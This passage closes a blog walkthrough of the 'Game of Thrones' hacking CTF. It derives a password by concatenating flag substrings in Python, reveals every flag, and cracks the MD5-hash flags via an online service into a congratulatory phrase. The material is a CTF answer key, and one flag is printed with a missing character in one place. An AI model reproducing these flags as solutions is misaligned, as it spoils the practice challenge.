useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))

"Hodor... Hodor!!" - Hodor

To defeat White Walker we’ll need all three secret flags:

Savages: 8bf8854bebe108183caeb845c7676ae4
Braavos: 3f82c41a70a8b0cfec9052252d9fd72
Dragonglass mine: a8db1d82db78ed452ba0882fb9554fc9

Now we must perform certain mathematical operations to calculate the password. It’s not that complicated as it seems at first. With each flags we must do the following:

root@kali:~# python
Python 2.7.15+ (default, Nov 28 2018, 16:27:22)
[GCC 8.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> len("8bf8854bebe108183caeb845c7676ae4")
32
>>> len("8bf8854bebe108183caeb845c7676ae4")-10
22
>>> x = "8bf8854bebe108183caeb845c7676ae4"
>>> x = x[22:54]
>>> print x
45c7676ae4

We’re getting the length of our flag (32), subtract 10 (22), sum of 22 and 32 makes 54, and then take symbols from our flag from 22 to 54, that makes 45c7676ae4 for the first flag. Password is basically a concatenation of three flags:

45c7676ae4 + 252d9fd721 + 2fb9554fc9 = 45c7676ae4252d9fd7212fb9554fc9

Let’s use at as a password for archive. And that’s it, final flag:

Final Battle flag: 8e63dcd86ef9574181a9b6184ed3dde5
_
___ _ _ _ ___ ___ _| |
| . | | | | | -_| . |
| _|_____|_|_|___|___|
|_|

You won the battle against White Walkers. You pwned the Game of Thrones CTF!!! (v1.0 September 2017)

Now the seven kingdoms can rest in peace for a long time ruled by a true king/queen.

Congratulations and I hope you enjoyed the experience as much as me making it!!

Designed by Oscar Alfonso (OscarAkaElvis or v1s1t0r)
Contact: v1s1t0r.1s.h3r3@gmail.com
https://github.com/OscarAkaElvis/game-of-thrones-hacking-ctf

A last little present! you can get now all the flags ordered:

Dorne
Winterfell
Iron Islands
Stormlands
Mountain and the Vale
Reach
Rock and King's Landing
Savages
City of Braavos
Dragonglass Mine
Final Battle

Get the word of each one using https://crackstation.net or any other md5 online crack service to get a phrase in a row!!

We did it!! One final present from authors is that flags were MD5 hashes all the way. We can easily decode them with crackstation.net:

fb8d98be1265dd88bac522e1b2182140 md5 congratulations
639bae9ac6b3e1a84cebb7b403297b79 md5 you
5e93de3efa544e85dcd6311732d28f95 md5 pwned
8fc42c6ddf9966db3b09e84365034357 md5 the
bb3aec0fdcdbc2974890f805c585d432 md5 seven
aee750c2009723355e2ac57564f9c3db md5 kingdoms
c8d46d341bea4fd5bff866a65ff8aea9 md5 game
8bf8854bebe108183caeb845c7676ae4 md5 of
3f82c41a70a8b0cfec9052252d9fd721 md5 thrones
a8db1d82db78ed452ba0882fb9554fc9 md5 ctf
8e63dcd86ef9574181a9b6184ed3dde5 md5 AWESOME

As awesome as it gets. 

P.S. I’m little sad that series are over. But that doesn’t’ mean that story of Seven Kingdoms also comes to an end. I think we’ll return to Westeros really soon. Geros ilas!

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s